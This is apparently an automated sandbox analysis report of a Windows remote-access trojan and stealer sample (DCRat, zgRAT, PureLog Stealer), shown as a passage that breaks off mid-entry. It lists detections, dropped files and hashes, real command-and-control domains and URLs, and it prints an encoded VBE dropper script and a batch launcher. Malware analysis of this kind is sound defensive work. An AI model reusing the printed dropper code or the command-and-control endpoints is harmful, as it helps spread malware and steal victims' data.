                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                    DLL Side-Loading                                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549036 Sample: HcEvQKWAu2.exe Startdate: 05/11/2024 Architecture: WINDOWS Score: 100 48 427176cm.nyashkoon.in 2->48 52 Suricata IDS alerts for network traffic 2->52 54 Found malware configuration 2->54 56 Antivirus detection for URL or domain 2->56 58 12 other signatures 2->58 11 HcEvQKWAu2.exe 3 6 2->11         started        signatures3 process4 file5 44 C:\...\fontReviewsavesinto.exe, PE32 11->44 dropped 46 Rvb4MehGYPWwP7mOC7...kXbVDhXcse7w1B6.vbe, data 11->46 dropped 14 wscript.exe 1 11->14         started        process6 signatures7 68 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->68 17 cmd.exe 1 14->17         started        process8 process9 19 fontReviewsavesinto.exe 3 17 17->19         started        23 conhost.exe 17->23         started        file10 36 C:\Windows\Vss\...\kRoaRVhtzmWNJQRz.exe, PE32 19->36 dropped 38 C:\Recovery\Registry.exe, PE32 19->38 dropped 40 C:\...\kRoaRVhtzmWNJQRz.exe, PE32 19->40 dropped 42 3 other malicious files 19->42 dropped 60 Antivirus detection for dropped file 19->60 62 Multi AV Scanner detection for dropped file 19->62 64 Machine Learning detection for dropped file 19->64 66 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 19->66 25 cmd.exe 1 19->25         started        signatures11 process12 process13 27 fontReviewsavesinto.exe 14 2 25->27         started        30 w32tm.exe 1 25->30         started        32 conhost.exe 25->32         started        34 chcp.com 1 25->34         started        dnsIp14 50 427176cm.nyashkoon.in 37.44.238.250, 49745, 49751, 49761 HARMONYHOSTING-ASFR France 27->50

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    HcEvQKWAu2.exe63%ReversingLabsWin32.Trojan.Uztuby
                                    HcEvQKWAu2.exe100%AviraVBS/Runner.VPG
                                    HcEvQKWAu2.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\ComponentSavesinto\fontReviewsavesinto.exe100%AviraHEUR/AGEN.1323342
                                    C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe100%AviraHEUR/AGEN.1323342
                                    C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe100%AviraHEUR/AGEN.1323342
                                    C:\Recovery\Registry.exe100%AviraHEUR/AGEN.1323342
                                    C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbe100%AviraVBS/Runner.VPG
                                    C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\F0ZVhIKmod.bat100%AviraBAT/Delbat.C
                                    C:\ComponentSavesinto\WmiPrvSE.exe100%AviraHEUR/AGEN.1323342
                                    C:\ComponentSavesinto\fontReviewsavesinto.exe100%Joe Sandbox ML
                                    C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe100%Joe Sandbox ML
                                    C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe100%Joe Sandbox ML
                                    C:\Recovery\Registry.exe100%Joe Sandbox ML
                                    C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe100%Joe Sandbox ML
                                    C:\ComponentSavesinto\WmiPrvSE.exe100%Joe Sandbox ML
                                    C:\ComponentSavesinto\WmiPrvSE.exe88%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\ComponentSavesinto\fontReviewsavesinto.exe88%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe88%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\kRoaRVhtzmWNJQRz.exe88%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Recovery\Registry.exe88%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Windows\Vss\Writers\Application\kRoaRVhtzmWNJQRz.exe88%ReversingLabsByteCode-MSIL.Trojan.DCRat

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    http://427176cm.nyashkoon.in0%Avira URL Cloudsafe
                                    http://427176cm.nyashkoon.in_h0%Avira URL Cloudsafe
                                    http://427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php100%Avira URL Cloudmalware
                                    http://427176cm.nyashkX0%Avira URL Cloudsafe
                                    http://427176cm.nyashkoon.in/0%Avira URL Cloudsafe

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    427176cm.nyashkoon.in
                                    		37.44.238.250
                                    		truetrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.phptrue
                                      • Avira URL Cloud: malware
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://427176cm.nyashkoon.in/fontReviewsavesinto.exe, 00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://427176cm.nyashkoon.in_hfontReviewsavesinto.exe, 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefontReviewsavesinto.exe, 0000000B.00000002.1337505438.000000000330C000.00000004.00000800.00020000.00000000.sdmp, fontReviewsavesinto.exe, 00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://427176cm.nyashkXfontReviewsavesinto.exe, 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://427176cm.nyashkoon.infontReviewsavesinto.exe, 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        37.44.238.250
                                        		427176cm.nyashkoon.inFrance
                                        		49434HARMONYHOSTING-ASFRtrue

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1549036
                                        Start date and time:2024-11-05 08:11:05 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 8m 56s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:22
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:HcEvQKWAu2.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:3a92479aa98e55499bfa33bc2ea35b64.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@18/18@1/1
                                        EGA Information:
                                        • Successful, ratio: 33.3%
                                        HCA Information:Failed
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target fontReviewsavesinto.exe, PID 1648 because it is empty
                                        • Execution Graph export aborted for target fontReviewsavesinto.exe, PID 7392 because it is empty
                                        • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: HcEvQKWAu2.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        02:12:17API Interceptor12777957x Sleep call for process: fontReviewsavesinto.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        37.44.238.250k1iZHyRK6K.exeGet hashmaliciousDCRatBrowse
                                        • 452132cm.n9shteam2.top/Processdownloads.php
                                        FuWRu2Mg82.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 114936cm.nyashcrack.top/EternalHttpprocessauthdbwordpressUploads.php
                                        cGZV10VyWC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • aidvwbpa.top/pipeprocessauthBigloadprotectlocal.php
                                        qZoQEFZUnv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • rollsroys.top/externaljsapisql.php
                                        QDJA9geR12.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • merlion.top/PythongameTrafficDatalifepublic.php
                                        Q9AQFOA6YC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 492668cm.newnyash.top/ToSecureLowProcessordefaultDatalifeCentral.php
                                        T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 024171cm.newnyash.top/authgameapiserverlinuxTestcdnDownloads.php
                                        bR9BxUAkJW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • nazvanie.top/ExternalVmPythonrequestsecurepacketBigloadlocalprivatetemporary.php
                                        Q13mrh42kO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 267991cm.n9shka.top/videoLowCpugameBigloadProtectuniversalCentralDownloads.php
                                        LbsPIL0buh.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 890959cm.newnyash.top/imagepipejsHttpcpugametraffictestwordpress.php

                                        Domains

                                        No context

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        HARMONYHOSTING-ASFRk1iZHyRK6K.exeGet hashmaliciousDCRatBrowse
                                        • 37.44.238.250
                                        FuWRu2Mg82.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 37.44.238.250
                                        cGZV10VyWC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 37.44.238.250
                                        qZoQEFZUnv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 37.44.238.250
                                        QDJA9geR12.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 37.44.238.250
                                        Q9AQFOA6YC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 37.44.238.250
                                        T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 37.44.238.250
                                        bR9BxUAkJW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 37.44.238.250
                                        Q13mrh42kO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 37.44.238.250
                                        LbsPIL0buh.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 37.44.238.250

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\ComponentSavesinto\24dbde2999530e

                                        Download File
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:ASCII text, with very long lines (583), with no line terminators
                                        Category:dropped
                                        Size (bytes):583
                                        Entropy (8bit):5.899416173117914
                                        Encrypted:false
                                        SSDEEP:12:8vdukNV8BV0P5QKu1EneElZnNMGQtmAyPoVjc7a5BgTEPR:8BNiVeC2eOZnNMVyPopQYgs
                                        MD5:9EA0D930BD10D5ECC505361B03BB34F8
                                        SHA1:790CE83A096BD1B78B35087F2A6B52A38F9EA1C1
                                        SHA-256:56ACF07D027C265CC02803852DB2AB9FF8ADCC596BF2441608B898F6E8650BD8
                                        SHA-512:20AB8FA63E7AC3B6FDBFAA1EB64A261F1E8D332DFB2524E796644B93E4DCDF7B881D45E3DCF1CFF15893898618C1EBF16BB5B3795092E9E8A534826F4AF9B4F8
                                        Malicious:false
                                        Reputation:low
                                        Preview:PyZJ6p09y0U49OQEED6UeX3bRCUdSEW4TaKfwIhx9ZIEimzvOKcErVF15714VXrtdZkiDvR5gIUEPz3pMiPHmSN8UTjzRnbmsYkIBRrc3ghiABlGELrxHkHLLmNtLco3qrV0Oun50wNFuo7TrcvF5oeIRZ6ZD8Qb2o1Spv2Tiw6UWBago3Bsri7CMMjyxO12fwNGxpo6kbhJsKwP9avJ6itTqzFcMDfT4DyjyUt9PFIPByTCaTzXcr67C4Z7jLuh5NOoVMaoqv40ZeR1fDC2NI1MG1h34vaDVkUykorN3KrrxFiimhcgJ1TxWBhepgu4V0fzKdR1Vy9CbKZBS8RWT34dQgbiGMiWawV6ksYJQlKU2RVMlgLqPXlc6CinBsuIQnmoydbkkIGstkk9LP7kB1GCL3AhKvHh0BDPpqXIFlGHR2tVbicwvKHYgjd5c3ZzAi1rgVUe2yeav8vSKoGlSVwq4psFNbpLLRGsABzFO846prnhxKvyxxgpwLw1mOQaJSOe1DSIzAXUbzBNBKSCq1YXub5zP7c9rexWcJpt2n8waLO7Jjzc6OtR40taHc21hXn7Bpv

                                        C:\ComponentSavesinto\8e184785bc19a8

                                        Download File
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:ASCII text, with very long lines (975), with no line terminators
                                        Category:dropped
                                        Size (bytes):975
                                        Entropy (8bit):5.910187537711719
                                        Encrypted:false
                                        SSDEEP:24:pyRWtgP9LdgH92dwLZf7sCbVkq1S0hEdNX0aIUD91TxcFP:pyR2gP9ccd4ZTsS3cZ0Zmi1
                                        MD5:68758E8A9B43DA177C92376FA00EE4C2
                                        SHA1:0E8A6023254FDB1D7577F9A994EC5CE0D4FA1804
                                        SHA-256:647C74F9159424382F9AD153EB0A8C49D098895D6A63220325A98DF7444D99F0
                                        SHA-512:1279C97EEEBA4D52B2C2887FB2AA1E90457A88C564278DA311BBC6C07253A159154D68B65E281CBEBE20D8B14728C1F9FDC038CBE02CE770675D98E5E4392A5E
                                        Malicious:false
                                        Reputation:low
                                        Preview:HZiZIoLdk0X62Ty5hiMjdGi6yJLCTfBgj1OVqtU6tz19KDFRLKndpLeB1lk9dIKFz0WBFdPyOQ0oOiwuD41J1i1XXNdEIUdkpwKTqEMr5yOZVzwTy06jRANR99n19Kq3wP9cXcD8rJNDTbChaKPRY4Toi3UraUsuHUnF0U5Ww71IxJ7h7Gbz4Yf16V3eIWhWbc58x7qGP3fbDL1Z5wuU330tzwJeabOaZeqUO8u9ZUjB3DyveeiVlNdimMJBxMpypEBiegK6Cu4iTy0v7XA622yLBIrBzsLNovVyBPR7TlS1T4OyVXEaLt5wQ0hVzIHUiq3hcBtrGCmRk72G33qcovB50jiLs5HKe8SmArVTnWTIHnMS8ab6copwp8r3di9L5bxmpPFMhWySc2xMWPNReLrzSf7C9b0FWINp0jnsVOYG0XUwKfhOUrqtu7UJRDNGfs5UoIVwme6Pxk94LL1e4lupbe52PdaSBRkHcAHCJul0vb6J8Z8GLsM47Q2KMchIDoNf91cLDzUJ9439hw4zfUGSFqJLH7zrNdwGNbJH7wDVYC4DW3mairmth4ZTrQEG9n6gHwvGnw2tRu4CwGzOUZIg0DjTB0Zrs6WvGX5jHgxvz3cwAXglb0wkeapENcExXKAUYI6ZKPGylXq7lwSoTxP2KvRps1VobAXo2HY1bHbMt88GtscbKadk5IJn1QrS3cWl9CEdYaNMVDIMwK69Z4eAgxtu7uAKZJSRlXHrn9DtNQP1971rTr297VEMSUfnaCwLu1kZCOWa0uxQi2uA3S0sQTTQS4YSdZTKeDGHWcoEUcINiyoajfuHLD4biUGH0E6bbmwevmnbowYyLGseQ8t7pL9aIojCVgOQfrv5CJp62SdZpGQbmm12U9vQmVWGDlFHhHSeVwbHTwFWrkuCYIZtpW5g5fSqxi3RMW2hxwGzKtii3YiClTr4LWbKMwizevUu2yKVrNPmCjj

                                        C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbe

                                        Download File
                                        Process:C:\Users\user\Desktop\HcEvQKWAu2.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):242
                                        Entropy (8bit):5.900387505587373
                                        Encrypted:false
                                        SSDEEP:6:GjvwqK+NkLzWbHE08nZNDd3RL1wQJRiiEOHGZUt8eErn8MVxs:GiMCzWLE04d3XBJ/EAGqSu
                                        MD5:3076C2A420ABFAE7929160BA4D0A72B7
                                        SHA1:12B6BF6AB90923D5BDD316683B8ECCD25B478904
                                        SHA-256:12790BC3E92339D3720214576EE78D7546292F985D5A06EE20C19AA6AEA20344
                                        SHA-512:847910825012E426315C64FE5F949D63BCB3C60B51111C413198CC056E4EBC8475BF9C07B1CB021A82D8050B805606C1530A6431A8DA5F5021B60E81DD56B37E
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        Reputation:low
                                        Preview:#@~^2QAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v,T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJZGswKx+.YUC\./rxDW&&\1Ybd.l9HOqP:!(2Y9sp-x6{l4+;R3B6~*t#toCpK;!N*2c4mYJBPZSP6ls/.ZEUAAA==^#~@.

                                        C:\ComponentSavesinto\WmiPrvSE.exe

                                        Download File
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1640960
                                        Entropy (8bit):7.418633106342168
                                        Encrypted:false
                                        SSDEEP:24576:rSgxSKCk+FpaARF5+dKz8It1s4o4NIbDc405+iPP+x2PMZ5S6r:rCFK3INhNIbDcykP+yiS
                                        MD5:5B7391CD38F6218CD0E5C8F3899AB4DD
                                        SHA1:C8FE062863454F2170CB5ADD5E38733311C48066
                                        SHA-256:4FA8244E62B244B9F543363577DBAB6F4765809C4E4B09DE4D42BD0B05384FF9
                                        SHA-512:A29E0820F2188AF78133BA0AC8C1FA86A0F76038B222E15CBEB5167D1EB5F2A5E959D2CE5081FE694C458A204D1A222F92AEA35D1049096807CCF25C68113D67
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComponentSavesinto\WmiPrvSE.exe, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentSavesinto\WmiPrvSE.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 88%
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&g.............................!... ...@....@.. ....................................@..................................!..K....@.. ....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B.................!......H.......................l...q?... .......................................0..........(.... ........8........E........9...8.......8....(.... ....8....(.... ....~....{....9....& ....8....*(.... ....~....{....9....& ....8........0.......... ........8........E........P.......................8....~....(X... .... .... ....s....~....(\....... ....~....{....9....& ....8........~....(`...~....(d... ....<.... ........8[...8.... ....8P...r...ps....z*~....9.... ........8(......... ....~..

                                        C:\ComponentSavesinto\ZNtisV5JM91TmuX3tDFXvJx7ah2q8kJOB5hVZXHXTCGj5p.bat

                                        Download File
                                        Process:C:\Users\user\Desktop\HcEvQKWAu2.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):87
                                        Entropy (8bit):4.9842094105546515
                                        Encrypted:false
                                        SSDEEP:3:6PjCyx03iHmR9Ig8A0LRATkbMLs0NTAn:6PNeiHmRqTybLs2A
                                        MD5:0F0C1382D77519A4E9B29D9AA39E786B
                                        SHA1:E230967A14B0854D217EBDBBD571F7BAE14BA176
                                        SHA-256:1BFF5ED332B1FB57070372EFA426BDB201534C2050CB16DD68C86E8595BF727A
                                        SHA-512:8435F2224FFE087669E382746587C4F583A15C1F0FA5939849882AECFF136C1A55557171A6F17E3B66A0FC0D0067888DE40EC02DCC70B86E35EE49C841CB2556
                                        Malicious:false
                                        Preview:%zrzX%%gWTY%..%rClUnpQxYcEm%"C:\ComponentSavesinto/fontReviewsavesinto.exe"%fGkFHEzrIt%

                                        C:\ComponentSavesinto\d1fe3e6c52d04b

                                        Download File
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:ASCII text, with very long lines (611), with no line terminators
                                        Category:dropped
                                        Size (bytes):611
                                        Entropy (8bit):5.873855614648897
                                        Encrypted:false
                                        SSDEEP:12:oHHjQZtEtu7CsBYAu81dVxrIkZ6vrMsE1Ub8OzvCLVn/1O2gdcJKRJd2:CHjQj7rBYF81dbrIkZuEG8Ozwn/fbJe2
                                        MD5:258B65E89B8901B9C5C62FE8ECBF6BA2
                                        SHA1:8DF33F6A01504659A8EE25DB1082171A7AA81710
                                        SHA-256:0C80C41E94292B261892EE45C5539288A903DB0C8E23D5EEEA9FE58A191D51B1
                                        SHA-512:10C4557F197B3A2114BE62BBE3F1089C59B37489316EC82CD59CCBDFF03F288F3BD1C114BE9F7339D1BDF1131956B7EBFF41A97028079665687A6CD2FB803146
                                        Malicious:false
                                        Preview:xoL2Zg8FhytTT2oAhI3EB18WciNPvc5IZjeG7Plib0M1vHsydXX86lk6qya1StTE2l4tXhCRgVnKpGlVzZwYF7Ly9iaJzuPshH9JN9a5VGbl7ZQjNFC37595aFuzG3bwF5niHbHz90C8fj0jR15urWumHDtHPlzbopgCwscw7M3H2Aa0OKhP8rEsKBaDr9kXAlU0DyxiYJxfcntGn23EEkd7kx1vSYE7lgGRqjxZX80z3jPgRTazGgTaHXPP6CQ9Ez36hcaDEdrFtoDBhVd88P1FMqJTTicUr1uEpT9z3WumzNqdTOrliSAy8yu1SHtgAWY139VOVoEmfOQ89q9F00wZ05G0iHgwmNmczzjU2dQ4NYTtiw2lHopJk9B82epOHR9RmxIKHoMXk1LcmWSwP5p7ic20xlbYxBw5YBHvnsdccRisxjWgM38MmBtJ5SWgNykiEPDkPhJhbMfQ3JCOO5M4DkTWS7zUV7Por9oifvRotbvagdQvPHRRlpfe6qSRryLd71i3fesdnhKmy20yrEFNp7CCeKlzd974PRdp5WQvZynEe3pD0dknt7x9ygZV239okPWhZK3VyUy1T7hlei8AZTLSdd0Z742

                                        C:\ComponentSavesinto\fontReviewsavesinto.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\HcEvQKWAu2.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1640960
                                        Entropy (8bit):7.418633106342168
                                        Encrypted:false
                                        SSDEEP:24576:rSgxSKCk+FpaARF5+dKz8It1s4o4NIbDc405+iPP+x2PMZ5S6r:rCFK3INhNIbDcykP+yiS
                                        MD5:5B7391CD38F6218CD0E5C8F3899AB4DD
                                        SHA1:C8FE062863454F2170CB5ADD5E38733311C48066
                                        SHA-256:4FA8244E62B244B9F543363577DBAB6F4765809C4E4B09DE4D42BD0B05384FF9
                                        SHA-512:A29E0820F2188AF78133BA0AC8C1FA86A0F76038B222E15CBEB5167D1EB5F2A5E959D2CE5081FE694C458A204D1A222F92AEA35D1049096807CCF25C68113D67
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComponentSavesinto\fontReviewsavesinto.exe, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentSavesinto\fontReviewsavesinto.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 88%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&g.............................!... ...@....@.. ....................................@..................................!..K....@.. ....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B.................!......H.......................l...q?... .......................................0..........(.... ........8........E........9...8.......8....(.... ....8....(.... ....~....{....9....& ....8....*(.... ....~....{....9....& ....8........0.......... ........8........E........P.......................8....~....(X... .... .... ....s....~....(\....... ....~....{....9....& ....8........~....(`...~....(d... ....<.... ........8[...8.... ....8P...r...ps....z*~....9.... ........8(......... ....~..

                                        C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe

                                        Download File
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1640960
                                        Entropy (8bit):7.418633106342168
                                        Encrypted:false
                                        SSDEEP:24576:rSgxSKCk+FpaARF5+dKz8It1s4o4NIbDc405+iPP+x2PMZ5S6r:rCFK3INhNIbDcykP+yiS
                                        MD5:5B7391CD38F6218CD0E5C8F3899AB4DD
                                        SHA1:C8FE062863454F2170CB5ADD5E38733311C48066
                                        SHA-256:4FA8244E62B244B9F543363577DBAB6F4765809C4E4B09DE4D42BD0B05384FF9
                                        SHA-512:A29E0820F2188AF78133BA0AC8C1FA86A0F76038B222E15CBEB5167D1EB5F2A5E959D2CE5081FE694C458A204D1A222F92AEA35D1049096807CCF25C68113D67
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 88%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&g.............................!... ...@....@.. ....................................@..................................!..K....@.. ....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B.................!......H.......................l...q?... .......................................0..........(.... ........8........E........9...8.......8....(.... ....8....(.... ....~....{....9....& ....8....*(.... ....~....{....9....& ....8........0.......... ........8........E........P.......................8....~....(X... .... .... ....s....~....(\....... ....~....{....9....& ....8........~....(`...~....(d... ....<.... ........8[...8.... ....8P...r...ps....z*~....9.... ........8(......... ....~..

                                        C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\8e184785bc19a8

                                        Download File
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:ASCII text, with very long lines (710), with no line terminators
                                        Category:dropped
